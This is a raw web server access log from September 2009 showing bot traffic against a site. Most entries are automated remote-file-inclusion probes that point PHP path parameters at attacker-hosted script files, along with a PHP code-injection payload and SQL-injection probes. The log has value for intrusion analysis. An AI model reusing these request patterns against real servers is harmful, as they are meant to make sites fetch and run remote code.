213.215.235.2 - - [12/Sep/2009:00:21:18 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:21:18 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:21:18 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:21:18 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:21:54 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:21:54 -0400] "GET /logs/access_log.Q109071100///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:21:54 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:22:04 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:22:04 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:22:12 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:22:12 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:22:20 -0400] "GET /logs/access_log.Q109062900//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:22:27 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:22:27 -0400] "GET /logs/access_log.Q109071100///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:22:27 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:22:30 -0400] "GET /logs/access_log.Q109062900//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:22:31 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:22:31 -0400] "GET /logs/access_log.Q109071100%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:22:31 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:00:23:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.215.235.2 - - [12/Sep/2009:00:23:30 -0400] "GET /logs/access_log.Q109051600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:23:31 -0400] "GET /logs/access_log.Q109051600%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:00:23:49 -0400] "GET //setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:00:23:49 -0400] "GET /logs//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:00:23:49 -0400] "GET /logs/access_log.Q109051200//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:00:23:49 -0400] "GET /logs/access_log.Q109081700//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
68.60.9.211 - - [12/Sep/2009:00:23:29 -0400] "GET http://www.aceonlinestore.com/logs/error_log.Q109070800 HTTP/1.1" 200 2844195 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.83.146.96 - - [12/Sep/2009:00:23:29 -0400] "GET http://www.aceonlinestore.com/logs/access_log.Q109070800 HTTP/1.1" 200 4336924 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
66.148.68.101 - - [12/Sep/2009:00:24:23 -0400] "GET /logs/access_log.Q109051200%20%20//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:00:24:23 -0400] "GET /logs/access_log.Q109081700%20%20//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:24:40 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:24:40 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:24:55 -0400] "GET /logs/access_log.Q109062900//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:25:50 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:25:50 -0400] "GET /logs/error_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:25:53 -0400] "GET /logs/access_log.Q109062900%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
66.148.68.101 - - [12/Sep/2009:00:26:48 -0400] "GET /logs/access_log.Q109051200//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.251.105.194 - - [12/Sep/2009:00:27:02 -0400] "GET /logs//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.251.105.194 - - [12/Sep/2009:00:27:02 -0400] "GET //setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.251.105.194 - - [12/Sep/2009:00:27:02 -0400] "GET /logs/access_log.Q109051200%20%20//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
199.120.90.223 - - [12/Sep/2009:00:27:07 -0400] "GET /logs/access_log.Q109081100//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
199.120.90.223 - - [12/Sep/2009:00:27:47 -0400] "GET /logs/access_log.Q109081100//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:00:28:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.148.68.101 - - [12/Sep/2009:00:28:23 -0400] "GET /logs/access_log.Q109081700//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:28:53 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:28:53 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:28:53 -0400] "GET /phphtml.php?htmlclass_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:28:53 -0400] "GET /logs/access_log.Q109052900%20%20/phphtml.php?htmlclass_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:28:54 -0400] "GET /logs/access_log.Q109062900%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
195.186.64.229 - - [12/Sep/2009:00:29:26 -0400] "GET /logs/access_log.Q109070800/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.0" 404 237 "-" "Mozilla/5.0"
195.186.64.229 - - [12/Sep/2009:00:29:26 -0400] "GET /logs/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.0" 404 215 "-" "Mozilla/5.0"
195.186.64.229 - - [12/Sep/2009:00:29:26 -0400] "GET /comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.0" 404 210 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:29:58 -0400] "GET /logs/access_log.Q109062900%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:00:30:15 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:00:30:15 -0400] "GET /logs/access_log.Q109061000///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:00:30:15 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:00:30:15 -0400] "GET /logs/access_log.Q109061000///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:00:30:15 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
211.233.69.41 - - [12/Sep/2009:00:30:15 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://muhanfile.net/DATA/id1.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
125.251.105.194 - - [12/Sep/2009:00:30:31 -0400] "GET /logs/access_log.Q109051200//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.251.105.194 - - [12/Sep/2009:00:30:32 -0400] "GET //setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.251.105.194 - - [12/Sep/2009:00:30:32 -0400] "GET /logs//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.251.105.194 - - [12/Sep/2009:00:30:33 -0400] "GET /logs/access_log.Q109081700//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Sep/2009:00:30:34 -0400] "GET //stats/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Sep/2009:00:30:34 -0400] "GET /logs//stats/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Sep/2009:00:30:34 -0400] "GET /logs/access_log.Q109051400%20%20//stats/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
64.22.96.36 - - [12/Sep/2009:00:30:53 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://jrigutto.com/blog2/media/id? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
213.215.235.2 - - [12/Sep/2009:00:31:02 -0400] "GET /phphtml.php?htmlclass_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:31:02 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:31:02 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:31:04 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:31:04 -0400] "GET /phphtml.php?htmlclass_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:31:04 -0400] "GET /logs/access_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
206.225.23.4 - - [12/Sep/2009:00:31:14 -0400] "GET /logs/access_log.Q109051100%20%20//stats/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:31:31 -0400] "GET /logs/error_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
213.215.235.2 - - [12/Sep/2009:00:31:32 -0400] "GET /logs/error_log.Q109052300%20%20/phphtml.php?htmlclass_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.251.105.194 - - [12/Sep/2009:00:32:47 -0400] "GET /logs/access_log.Q109051200%20%20//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
125.251.105.194 - - [12/Sep/2009:00:32:48 -0400] "GET /logs/access_log.Q109081700%20%20//setup.php?dir=http://www.goldenpost.co.kr/bbs/script/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:00:33:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.55.165.80 - - [12/Sep/2009:00:33:38 -0400] "GET //?sourcedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
72.55.165.80 - - [12/Sep/2009:00:33:39 -0400] "GET /logs/access_log.Q109052700//?sourcedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
72.55.165.80 - - [12/Sep/2009:00:33:39 -0400] "GET /logs//?sourcedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 200 17503 "-" "libwww-perl/5.805"
72.55.165.80 - - [12/Sep/2009:00:33:52 -0400] "GET /logs/access_log.Q109072200//?sourcedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
65.74.118.33 - - [12/Sep/2009:00:32:53 -0400] "GET http://www.aceonlinestore.com/logs/error_log.Q109051100 HTTP/1.1" 200 4162834 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
76.24.95.44 - - [12/Sep/2009:00:33:28 -0400] "GET http://www.aceonlinestore.com/logs/access_log.Q109051100 HTTP/1.1" 200 5205411 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.222.1.40 - - [12/Sep/2009:00:35:59 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
67.222.1.40 - - [12/Sep/2009:00:35:59 -0400] "GET /logs/error_log.Q109052800%20%20///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.222.1.40 - - [12/Sep/2009:00:35:59 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
67.222.1.40 - - [12/Sep/2009:00:36:08 -0400] "GET /logs/access_log.Q109052800%20%20///?_SERVER[DOCUMENT_ROOT]=http://web.hocome.com//modules/Forums/admin/zfxid1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
208.43.135.137 - - [12/Sep/2009:00:36:08 -0400] "GET //products.php?catID=%22' HTTP/1.1" 404 211 "-" "libwww-perl/5.831"
195.186.64.229 - - [12/Sep/2009:00:36:29 -0400] "GET /logs/access_log.Q109053000%20%20/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.0" 404 239 "-" "Mozilla/5.0"
195.186.64.229 - - [12/Sep/2009:00:36:29 -0400] "GET /logs/access_log.Q109070800%20%20/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.0" 404 239 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:36:32 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
174.34.163.101 - - [12/Sep/2009:00:36:32 -0400] "GET /logs/access_log.Q109082500//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.55.165.80 - - [12/Sep/2009:00:36:36 -0400] "GET /logs/access_log.Q109071700%20//?sourcedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
72.55.165.80 - - [12/Sep/2009:00:36:49 -0400] "GET /logs/access_log.Q109052700%20//?sourcedir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
174.137.176.69 - - [12/Sep/2009:00:36:56 -0400] "GET //products.php?catID=%22' HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
174.137.176.70 - - [12/Sep/2009:00:36:56 -0400] "GET //products.php?catID=%22' HTTP/1.1" 404 211 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Sep/2009:00:38:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.129.166.203 - - [12/Sep/2009:00:41:27 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:41:27 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:41:29 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:41:30 -0400] "GET /logs/access_log.Q109052800///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:41:29 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 17504 "-" "Mozilla/5.0"
118.129.166.203 - - [12/Sep/2009:00:41:43 -0400] "GET /logs/access_log.Q109052800%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.158.127.241 - - [12/Sep/2009:00:41:53 -0400] "GET /logs/error_log.Q109060900//?sourcedir=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.158.127.241 - - [12/Sep/2009:00:41:53 -0400] "GET //?sourcedir=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
124.158.127.241 - - [12/Sep/2009:00:41:54 -0400] "GET /logs//?sourcedir=http://alandar.net/www2/log1.txt? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:42:48 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:42:48 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:42:49 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:42:50 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:42:50 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:42:50 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:42:56 -0400] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:00 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:00 -0400] "GET /logs/access_log.Q109051500//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:07 -0400] "GET /logs/access_log.Q109081000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
69.175.44.226 - - [12/Sep/2009:00:43:14 -0400] "GET /logs/include/admin/admin_news_bot.php?root_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.175.44.226 - - [12/Sep/2009:00:43:14 -0400] "GET /include/admin/admin_news_bot.php?root_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.175.44.226 - - [12/Sep/2009:00:43:15 -0400] "GET /logs/access_log.Q109053000%20%20/include/admin/admin_news_bot.php?root_path=http://www.ybcyyy.com/data/zkjs/fx29id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:00:43:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [12/Sep/2009:00:43:19 -0400] "GET /logs/access_log.Q109081000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:20 -0400] "GET /logs/access_log.Q109081000//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:24 -0400] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:00:43:24 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
